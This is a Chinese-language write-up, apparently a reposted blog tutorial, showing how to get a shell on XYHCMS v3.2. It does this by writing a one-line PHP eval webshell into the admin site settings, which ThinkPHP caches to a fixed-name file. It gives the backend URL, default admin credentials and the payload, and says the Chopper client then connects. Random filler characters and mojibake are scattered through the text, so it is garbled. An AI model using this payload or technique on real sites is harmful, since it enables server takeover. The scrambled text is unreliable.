一大幫水軍正在來襲.......
XYHCMS
行云海CMS(XYHCMS)是完全源碼開放的一套CMS內(nèi)容管理系統(tǒng)努酸,使用簡單禾蚕,輕松建站药薯。企業(yè)建站绑洛、個人博客、個性網(wǎng)站的首選童本。系統(tǒng)簡潔真屯,高效,易用穷娱,一般的開發(fā)人員能夠使用本系統(tǒng)以最低的成本绑蔫、最少的人力投入,在最短的時間內(nèi)架設(shè)一個功能齊全泵额、性能優(yōu)異的網(wǎng)站配深。
xyhcms和Jymusic cms一樣使用了ThinkPHP框架,這里不贅述嫁盲,直接給出緩存文件的位置
先看一下管理員登錄頁面的源代碼篓叶,看到核心入口為ThinkPHP.php,找到并打開查看
圖片.png
發(fā)現(xiàn)應(yīng)用緩存目錄為Temp文件夾ThinkPHP.php
圖片.png
打開Temp文件夾會發(fā)現(xiàn)有很多緩存文件亡资,我們隨便打開即可看看澜共,可以發(fā)現(xiàn)里面的內(nèi)容有點像網(wǎng)站配置信息
圖片.png
所以我們在后臺的網(wǎng)站設(shè)置處插入一句話,就會被ThinkPHP寫入緩存文件锥腻。而且這個緩存文件的文件名都是固定不變的嗦董,這也是導(dǎo)致getshell的原因。
訪問后臺路徑
http://127.0.0.1/xyhcms_v3.2/uploads_code/xyhai.php?s=/Index/index
用戶名和密碼:xyhcms 123456
<?php @eval($_POST[‘cmd’]);?>
圖片.png
成功插入后瘦黑,我們來執(zhí)行一下phpinfo()函數(shù)看看京革,菜刀也能成功連接
圖片.png
圖片.png
